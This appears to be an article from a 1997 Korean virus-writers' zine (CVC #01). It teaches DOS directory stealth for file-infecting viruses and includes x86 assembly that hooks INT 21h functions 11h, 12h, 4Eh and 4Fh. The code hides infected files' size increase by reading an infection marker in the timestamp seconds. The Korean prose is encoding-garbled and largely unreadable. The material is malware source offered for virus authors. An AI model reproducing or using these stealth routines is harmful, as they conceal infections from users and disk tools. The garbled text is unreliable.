
 Øa…IØa ã°§Û                                                      CVC #01  97/6

-------------------------------------------------------> Hong gil-dong + Osiris

Øa»âØa ã°§Û ∑°úe?

  §a∑°ú·Øaàa †Å°°ü°µA ¨w∫Å–aà·êa Ãa∑©µA àqµq ïˆ∑iòÅ °A°°ü°µ¡ Ãa∑© ã©∑°àa §a∑°
ú·Øaàa ¿aª°–e †e«q †g¥aª°à·êa ∏‚¥·ª°âA ñEîa.
∑°úÂ —e¨w∑e ƒÒœA»· ¨a∂w∏aàa ∏aØ•∑Å ƒÒœA»·àa §a∑°ú·ØaµA àqµqïˆîaìe àı∑i ¥iÆÅ∑∂
ìeâÅã°àa ñEîa.
  ∑°àı∑i œ°–aã° ∂·–aµa dir °wùw∑°êa ã°»a †Å°°ü° àÒ¨Ç°wùw∑° ∫Å¥·πv∑iòÅ §a∑°ú·Øa
àa ∫óàeµA¨· ∑°°wùw∑i àaù°¿Å ∏˜¨w∏‚∑• Ãa∑© ã©∑°µ¡ °A°°ü° «aã°üi ƒÒœA»· ¨a∂w∏aµA
âA •°µa ∫Åìeàı∑i Øa»âØa ã°§Û ∑°úaâ°–eîa.

€£€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€§
€¢ ó°ùB…°ü° Øa»âØa 1-2                                      €¢
€¢¥aúÅ∑Å êÅ∂w∑e  DOS∑Å `Dir' Øa»âØaµA â≈–e àı∑≥ì°îa         €¢
€¢dos∑Å dir °wùw∑aù° §a∑°ú·ØaµA àqµqñE Ãa∑©«aã°üi —¬∑•–iòÅ  €¢
€¢§a∑°ú·Øaàa ¥·ò˝âA ∏aØ•∑Å àqµq¨aØ©∑i Æëã°ìeª° •°µa∫ìì°îa   €¢
€¶€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€•
 ---------------- 1-1 µA ∑°¥·¨· ----------------------------
    < ¥aúÅìe •°…∑ fcb∑Å êÅ¶ÅäÅπ°∑≥ì°îa >
 ‘’‘Õ‘Õ‘—‘Õ‘Õ‘—‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘∏
 ‘≥∫Å≠°‘≥«aã°‘≥  ¨È                      °w                        ‘≥
 ‘∆‘Õ‘Õ‘ÿ‘Õ‘Õ‘ÿ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘µ
 ‘≥ 00h‘≥  1 ‘≥  óaúa∑°ßa §Â—° 00=—e∏Å óaúa∑°ßa 01=A,02=B,03=C ówów‘≥
 ‘≥ 01h‘≥  8 ‘≥  Ãa∑©∑°üq.                                         ‘≥
 ‘≥ 09h‘≥  3 ‘≥  Ãa∑© —¬∏w∏a.                                      ‘≥
 ‘≥ 0Ch‘≥  2 ‘≥  —e∏Åßiùb.                                         ‘≥
 ‘≥ 0Eh‘≥  2 ‘≥  ùA≈°óa «aã°                                       ‘≥
 ‘≥ 10h‘≥  4 ‘≥  §a∑°Àa îe∂·∑Å —¡∑©«aã°                            ‘≥
 ‘≥ 14h‘≥  2 ‘≥  Ãa∑© ¬Aπ∑ ÆÅ∏˜∑©∏a                                ‘≥
 ‘≥ 16h‘≥  2 ‘≥  Ãa∑© ¬Aπ∑ ÆÅ∏˜Ø°àe                                ‘≥
 ‘≥ 18h‘≥  4 ‘≥  ¨a∂w–aª° ¥g∑q                                     ‘≥
 ‘≥*1Ch‘≥  4 ‘≥  `10h' µ¡à{ª°†e ∑°àt∑° —¡°eµA ŒaØ°ñEîa             ‘≥
 ‘≥ 20h‘≥  1 ‘≥  —e∏ÅùA«aóa∑Å ∫Å≠°                                 ‘≥
 ‘≥ 21h‘≥  4 ‘≥  ¨wîÅùA≈°óa                                        ‘≥
 ‘‘‘Õ‘Õ‘œ‘Õ‘Õ‘œ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘æ
  * = §a∑°ú·ØaµA ∑Å–Å §aé·¥·ª°ìe ¶Å¶Ö

   < ¥aúÅìe —¬∏w fcb∑Å äÅπ°∑≥ì°îa>
  •°…∑ FCB µ¡ Àiü•∏Ò∑e 7§a∑°Àaàa î· «aîaìe àı∑°îa
€£€°€°€°€®€°€°€®€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€§
€¢∫Å≠°  €¢«aã°€¢¨È          °w                        ‘≥
‘∆‘Õ‘Õ‘Õ‘ÿ‘Õ‘Õ‘ÿ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘Õ‘µ
€¢ -07h €¢ 1  €¢ —¬∏w FCB ŒaØ¢∑aù° –w¨w ffh ù° ñA∑∂îa €¢
€¢ -06h €¢ 5  €¢ ¨a∂w–aª° ¥g∑q                        €¢
€¢ -01h €¢ 1  €¢ ≠¢¨˜ §a∑°Àa                          €¢
€¶€°€°€°€™€°€°€™€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€•
  —¬∏w FCB üi äÅ•i–aìe §w§Û∑e ¿ı§ÂºÅ §a∑°Àaüi 1 ªwàaØ°≈a
  0 ∑°ñA°e —¬∏w FCB ∑≥ì°îa
  îaüe §w§Ûï° ∑∂ª°†e ∑°§w§Û∑° àa∏w àeîe–sì°îa

€£€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€§
€¢ ó°ùB…°ü° Øa»âØa 1-3                                      €¢
€¢¥aúÅ∑Å êÅ∂w∑e  DOS∑Å `Dir' Øa»âØaµA â≈–e àı∑≥ì°îa         €¢
€¢dos∑Å dir °wùw∑aù° §a∑°ú·ØaµA àqµqñE Ãa∑©«aã°üi —¬∑•–iòÅ  €¢
€¢§a∑°ú·Øaàa ¥·ò˝âA ∏aØ•∑Å àqµq¨aØ©∑i Æëã°ìeª° •°µa∫ìì°îa   €¢
€¶€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€•
 ==================== 1-2 µA ∑°¥·¨· ===================

   dir_stealth:
          pushf                   ;INT Call üi ≠¢∑≥ì°îa
          push    cs              ;∑°âµ∑aù° îaØ° ñAï©¥a µ≥ì°îa
          call    Int21Call       ;int 21üi Ø©–ó–sì°îa
          test    al,al           ;¨˜â∑–a°e AL=00h àa ∏·∏wñSì°îa
          jnz     no_good         ;µAú·°e π∑ûa–sì°îa

          push    ax
          push    bx
          push    es
          mov     ah,51h  ;—e∏Å PSP üi ¥Ëìeîa
          int     21h     ; BX µA psp ≠Aãa†ÂÀa ∫Å≠°àa ¬âùb

          mov     es,bx         ;ES now has PSP segment Address
          cmp     bx,es:[16h]   ;—e∏Å∑Å pspàa ∏aØ•∑Å psp ∑•àa?
          jnz     exit_man      ;¥aì°°e îaØ° ¨È∏˜–eîa
          mov     bx,dx         ;BX àa FCBüi àaü°«•îa
          mov     al,[bx]       ;AL µAìe —e∏Å óaúa∑°ßaàa êÒâaª•îa
          push    ax            ;—¬∏w fcbüi àÒ¨a–aã° ∂·–Å ∏·∏w
          mov     ah,2fh        ;DTA üi ¥Ëìeîa
          int     21h
          pop     ax            ; AL = FFh
          inc     al            ; —¬∏w fcb∑•ª° àÒ¨a
          jnz     fcb_ok        ; ¥aì°°e •°…∑ fcb
          add     bx,7h         ; †x∑a°e —¬∏w fcb
  fcb_ok: mov     ax,es:[bx+17h]  ;Ø°àe∑i ¥Ëìeîa
          and     ax,1fh          ;¡°†e êqâA–eîa
          xor     al,1dh          ;58 ¡°∑•àa —¬∑•–eîa
          jnz     not_infected    ;¥aì°°e , àqµq∑° ¥eñE Ãa∑©
          and     byte ptr es:[bx+17h],0e0h   ;¡°üi •¢äÅ–eîa
          sub     es:[bx+1dh],virus_size ;Ãa∑©«aã°µA¨· §a∑°ú·Øa
          sbb     es:[bx+1fh],ax         ;«aã°üi ®Öîa
  not_infected:
          pop     es
          pop     bx
          pop     ax
  no_good:iret
=========================== dir Øa»âØa µ≈∏Âè{ ==============


     DIR Øa»âØa 2§ÂΩA §w§Û 2-1

 ¥|µA ≠°àÅñE §w§Û∑e DOS∑Å DIR°wùwµA†e “aâ¡üi §i“·–eîa
 œ°Ø° â∑°êa ë°»Âó°Øa«a∑Å FILEFIND °wùw∑e FCBüi ¨a∂w–aª° ¥gâ°
 DTAüi ¨a∂w–aã° òÅ¢ÖµA ¥¢àe îaüe Øa»âØa ã°§Û∑° ¨a∂wñEîa

 ÆÖ¨·ï°

 1,∑•»·úÛÀa 21∑Å 4EH,4FHüi àaù°¿Öîa
 2,àaù°¿Ö ∑•»·úÛÀaüi Ø©–ó–eîa
 3,ƒÅü° œiúÅãaüi àÒ¨a–eîa
    CF=1 Ãa∑©∑° ¥Ù∑sì°îa
    CF=0 Ãa∑©∑i ¿x¥v∑sì°îa
 4,Ø°àe∑i ¡A«a–eîa
   ¡°àa 58¡° ∑°°e Ãa∑©∑e §a∑°ú·ØaµA àqµqñEàı∑°îa
   ¡°àa 58¡°àa ¥aì°°e Ãa∑©∑e §a∑°ú·ØaµA àqµq∑° ¥eñEàı∑°îa
 5.§a∑°ú·ØaµA àqµqïˆ∑a°e Ãa∑©«aã°µA¨· §a∑°ú·Øa
   «aã°üi ®Åâ° ¬âùb–eîa
 6.π∑ûa–eîa

 DTA äÅπ°

  €¢∫Å≠°€¢«aã°€¢             ¨È°w                 €¢
  €ß€°€°€´€°€°€´€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€°€©
  €¢00h €¢1   €¢óaúa∑°ßa ¢Ö∏a                     €¢
  €¢01h €¢11  €¢∑±Ø° ∏·∏w∏w≠°                     €¢
  €¢0Ch €¢1   €¢≠¢¨˜                              €¢
  €¢0Dh €¢2   €¢ó°úÇ…°ü° Ø°∏bª°∏Ò                 €¢
  €¢0Fh €¢2   €¢¶Å°°ó°úÇ…°∑Å Ø°∏b«iú·Øa»·         €¢
  €¢11h €¢4   €¢•°üA                              €¢
  €¢15h €¢1   €¢≠¢¨˜                              €¢
  €¢16h €¢2   €¢Ø°àe               @              €¢
  €¢18h €¢2   €¢êiºa                              €¢
  €¢1Ah €¢4   €¢Ãa∑©«aã°           *              €¢
  €¢1Eh €¢13  €¢Ãa∑©∑°üqâ¡ —¬∏w∏a                 €¢

    * = §a∑°ú·ØaµA àqµqñA°e Ãa∑©«aã°àa •e–eîa
  @ = §a∑°ú·ØaµA àqµqïˆìeª° àÒ¨a–eîa (¡° ¶Å¶Ö)
====================== 2-1 ==============================









  Osiris : ∑° §w§Û∑e ï°Øa¿wµA¨·ìe ≠°∂w∑° ¥Ùîaâ° –sì°îa.
           ªb, ∂Âï°∂Å 95 µA¨· ï°Øa¿w∑i µiµv∑iòÅìe Øa…IØa ã°§Û∑° ¥e†‚”•îaìe
           ≠°ü°∫a.

  îa∑q∑e Øa…IØa §a∑°ú·Øa∑Å ∏Â—w∏‚∑• µÅ ∑≥ì°îa.


int_21:
           ....
           cmp ah,11h        ; DIR °wùw∑•àa ? (¬A¡°∑Å Ãa∑© ¿xã°)
           je DIR_STEALTH    ; ãaú·°e Øa…IØaù°
           cmp ah,12h        ; DIR °wùw∑•àa ? (îa∑q Ãa∑© ¿xã°)
           je DIR_STEALTH
           cmp ah,4eh        ; Ãa∑© ¿xã° ∑•àa ?
           je DTA_STEALTH
           cmp ah,4fh        ; îa∑q Ãa∑© ¿xã° ∑•àa ?
           je DTA_STEALTH
           ....              ; µaã°µA ≈°óaàa âÅ≠¢ µ¡¥° –eîa.

DIR_STEALTH:

        call    dos_emu      ; DIR °wùw∑i ÆÅ–ó–eîa.
        pushf                ;
        pusha                ;
        push    ds,es        ;
        or      al,al        ; ¨˜â∑∏‚∑aù° è{êvêa ?
        jnz     exit_size_fcb


        mov     ah,2fh       ; DTA ∫Å≠° ¥Ëã° (ES:BX)
        call    dos_emu      ;
        push    es
        pop     ds           ; —¬∏w FCB ∑•àa ?
        cmp     byte ptr [bx],0ff
        jne     FCB_not_extended
        add     bx,7         ; —¬∏w FCB ∑°°e +7 –Å∫ë
FCB_not_extended:
        call    test_4_executable ;
        jc      exit_size_fcb     ; àqµq µa¶Å ów∑i ß°äa –aìe ¶Å¶Ö
        call    test_4_infection  ;
        jc      exit_size_fcb     ;
        call    test_min_size     ;
        jc      exit_size_fcb     ;

                                  ; §a∑°ú·Øa ã©∑° ®Åã°
        sub     word ptr [bx+1dh],virus_size
        sbb     word ptr [bx+1fh],0

exit_size_fcb:
        pop     es
        pop     ds
        popa
        popf
        retf    2



DTA_STEALTH:                ; 4Eh,4Fh àa µ÷∑iòÅ
        call    dos_emu


        pushf
        pusha
        push    ds,es
        or      al,al        ; ¨˜â∑ ?
        jnz     exit_size_fcb


        mov     ah,2fh       ; DTA ∫Å≠° ¥Ëã°
        call    dos_emu
        push    es
        pop     ds

        call    test_4_executable
        jc      exit_size_dta     ; àqµq µa¶Åów ß°äa
        call    test_4_infection  ;
        jc      exit_size_dta     ;
        call    test_min_size     ;
        jc      exit_size_dta     ;

        sub     word ptr [bx+1ah],virus_size
        sbb     word ptr [bx+1ch],0

exit_size_dta:
        pop es       ; ∑°¶Å¶ÖµA îÅ–e ª©¢Ö∑° †gîa.
        pop ds       ;
        popa         ;
        popf         ;
        retf 2       ;

  retf 2 àa ¢©åa ?
  •°…∑∑Å ∑•»·úÛÀaüi àaù°¿ñ∑i âw∂Å –Åîw œaù°ãaúëµA¨· ∂•úÅ∑Å ã°ìw∑i –aª°ìe °µ–e
îa. òaúa¨·, úë¨w∫Å œaù°ãaúë∑° ∏˜¨w∏‚∑• ∑©∑i àaù°¿Å¨· ∏aã°∑©∑i –aâ° ∂•úÅ ∑•»·
úÛÀaù° πA¥·ä•∑i êÒã•îa.
  –aª°†e, ∂·∑Å ûÅÀ•∑e DIR ûÅÀ• ãa ∏a¡A∑°îa.
  ªb, §a∑°ú·Øa êÅ¶ÅµA¨· DIR ∑i ¿·ü°–aìe àı∑°îa.
  ¢âù• §a∑°ú·ØaµA àÈü• Ãa∑©∑e ∏˜¨w∏‚∑• ã©∑°ù° •°µa∫Öîa.
  retf 2 ìe ∑•»·úÛÀa °wùw∑i †a√°â° îaØ° ∑•»·úÛÀaüi —°¬â–e âµ∑aù° πA¥·ä•∑i êÒ
ã°ã° ∂·–Å¨· ∑°îa. †e¥¢ ∂•úÅ ∑•»·úÛÀa 21h ù° ∏Òœa –eîa°e DIR °wùw∑° ∏ÅØ©–óñI
àı∑°â° §a∑°ú·Øaàa –e ∑©∑e †iºw –ıàı∑° ñEîa.

  ãaü°â°, –eàaª°
  CHKDSK êa SPEEDISK àa Ø©–óñI âw∂Å Øa…IØaã°§Û∑° ∏bï∑ñA°e ∑° ñÅ œaù°ãaúë∑e
FAT µAú·úaâ° êaµ•îa. òaúa¨· CHKDSK êa SPEEDISK àa Ø©–óñA°e Øa…IØaã°§Û∑° ∏bï∑
–aª° ¥gâA †eói¥·¥° –eîa.
